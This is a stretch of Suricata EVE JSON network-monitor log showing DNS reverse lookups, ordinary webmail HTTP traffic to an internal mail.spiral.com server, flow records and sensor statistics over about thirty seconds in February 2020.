{"timestamp":"2020-02-29T00:07:51.908564+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1153,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:52.016611+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60758,"proto":"UDP","dns":{"type":"answer","id":1153,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:07:52.016611+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60758,"proto":"UDP","dns":{"type":"answer","id":1153,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:52.097412+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:07:52.097516+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:07:54.171367+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7998},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":31377,"tx_id":1}} {"timestamp":"2020-02-29T00:07:57.000166+0000","event_type":"stats","stats":{"uptime":14129,"capture":{"kernel_packets":133931,"kernel_drops":0},"decoder":{"pkts":133933,"bytes":92600525,"invalid":183,"ipv4":132470,"ipv6":8,"ethernet":133933,"raw":0,"null":0,"sll":0,"tcp":127324,"udp":4948,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2257,"failed_udp":110},"tx":{"http":4554,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2335}},"flow_mgr":{"closed_pruned":2700,"new_pruned":15,"est_pruned":2307,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19843,"memcap
_state":0,"memcap_global":0},"http":{"memuse":76081,"memcap":0}}} {"timestamp":"2020-02-29T00:07:57.000953+0000","flow_id":1853994208105121,"event_type":"flow","src_ip":"192.168.10.122","src_port":37326,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:56.692897+0000","end":"2020-02-29T00:02:56.798619+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:57.100639+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2334,"tx_id":2}} {"timestamp":"2020-02-29T00:08:02.053815+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9702,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:02.162101+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58162,"proto":"UDP","dns":{"type":"answer","id":9702,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:08:02.162101+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58162,"proto":"UDP","dns":{"type":"answer","id":9702,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:02.253251+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:08:02.253251+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:03.000491+0000","flow_id":1908200990740010,"event_type":"flow","src_ip":"192.168.10.122","src_port":42172,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:02.101930+0000","end":"2020-02-29T00:03:02.213187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:04.000248+0000","event_type":"stats","stats":{"uptime":14136,"capture":{"kernel_packets":133933,"kernel_drops":0},"decoder":{"pkts":133936,"bytes":92600723,"invalid":183,"ipv4":132473,"ipv6":8,"ethernet":133936,"raw":0,"null":0,"sll":0,"tcp":127327,"udp":4948,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2257,"failed_udp":110},"tx":{"http":4554,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2335}},"flow_mgr":{"closed_pruned":2700,"new_pruned":15,"est_pruned":2308,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked"
:65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":76074,"memcap":0}}} {"timestamp":"2020-02-29T00:08:06.000428+0000","flow_id":1901152949615255,"event_type":"flow","src_ip":"192.168.10.122","src_port":59490,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:05.506519+0000","end":"2020-02-29T00:03:05.617809+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:06.000596+0000","flow_id":2199893709972968,"event_type":"flow","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":20,"bytes_toserver":3061,"bytes_toclient":18001,"start":"2020-02-29T00:06:56.878056+0000","end":"2020-02-29T00:07:05.888377+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:07.254604+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34764,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":613,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:07.957566+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62353,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:07.963657+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47439,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:08.000688+0000","flow_id":2064146958623533,"event_type":"flow","src_ip":"192.168.10.122","src_port":48633,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:07.238381+0000","end":"2020-02-29T00:03:07.343781+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:08.066104+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44264,"proto":"UDP","dns":{"type":"answer","id":62353,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:08.066104+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44264,"proto":"UDP","dns":{"type":"answer","id":62353,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:08.072093+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36865,"proto":"UDP","dns":{"type":"answer","id":47439,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:08:08.072093+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36865,"proto":"UDP","dns":{"type":"answer","id":47439,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:08.155844+0000","flow_id":1596077147384852,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=zwiFi46-w1WbjcxymnmTfV7&uniq=1582934887646","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5164}} {"timestamp":"2020-02-29T00:08:08.292009+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849}} 
{"timestamp":"2020-02-29T00:08:09.000709+0000","flow_id":117556125411825,"event_type":"flow","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":24,"bytes_toserver":2365,"bytes_toclient":25319,"start":"2020-02-29T00:06:48.567793+0000","end":"2020-02-29T00:07:08.037208+0000","age":20,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:10.000794+0000","flow_id":2220655566946137,"event_type":"flow","src_ip":"192.168.10.122","src_port":49403,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:08.950105+0000","end":"2020-02-29T00:03:09.055838+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:10.644824+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43729,"tx_id":0}} {"timestamp":"2020-02-29T00:08:10.657157+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46096,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6009,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:08:10.765374+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46096,"proto":"UDP","dns":{"type":"answer","id":6009,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:10.765374+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46096,"proto":"UDP","dns":{"type":"answer","id":6009,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:10.820420+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526}} {"timestamp":"2020-02-29T00:08:10.921548+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} 
{"timestamp":"2020-02-29T00:08:10.923541+0000","flow_id":1066967241298197,"event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:08:11.000184+0000","event_type":"stats","stats":{"uptime":14143,"capture":{"kernel_packets":133962,"kernel_drops":0},"decoder":{"pkts":133984,"bytes":92620708,"invalid":183,"ipv4":132521,"ipv6":8,"ethernet":133984,"raw":0,"null":0,"sll":0,"tcp":127369,"udp":4954,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2720,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2736,"synack":2727,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1763,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2260,"failed_udp":110},"tx":{"http":4557,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2338}},"flow_mgr":{"closed_pruned":2702,"new_pruned":15,"est_pruned":2311,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout"
:3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":89242,"memcap":0}}} {"timestamp":"2020-02-29T00:08:11.005418+0000","flow_id":503484692486814,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.123","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:03:10.449182+0000","end":"2020-02-29T00:03:10.451143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:11.108345+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15506,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:11.216826+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47136,"proto":"UDP","dns":{"type":"answer","id":15506,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:11.216826+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47136,"proto":"UDP","dns":{"type":"answer","id":15506,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:11.283813+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:08:11.283813+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":0}} {"timestamp":"2020-02-29T00:08:13.158140+0000","flow_id":1596077147384852,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34766,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=zwiFi46-w1WbjcxymnmTfV7&uniq=1582934887646","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5164},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":17865,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:16.284764+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52704,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":0}} {"timestamp":"2020-02-29T00:08:17.000297+0000","flow_id":285025491706982,"event_type":"flow","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1058,"start":"2020-02-29T00:07:11.418918+0000","end":"2020-02-29T00:07:16.615880+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:08:18.000294+0000","event_type":"stats","stats":{"uptime":14150,"capture":{"kernel_packets":134019,"kernel_drops":0},"decoder":{"pkts":134025,"bytes":92636252,"invalid":183,"ipv4":132560,"ipv6":8,"ethernet":134025,"raw":0,"null":0,"sll":0,"tcp":127404,"udp":4958,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2722,"ssn_memcap_drop":0,"pseudo":342,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2738,"synack":2729,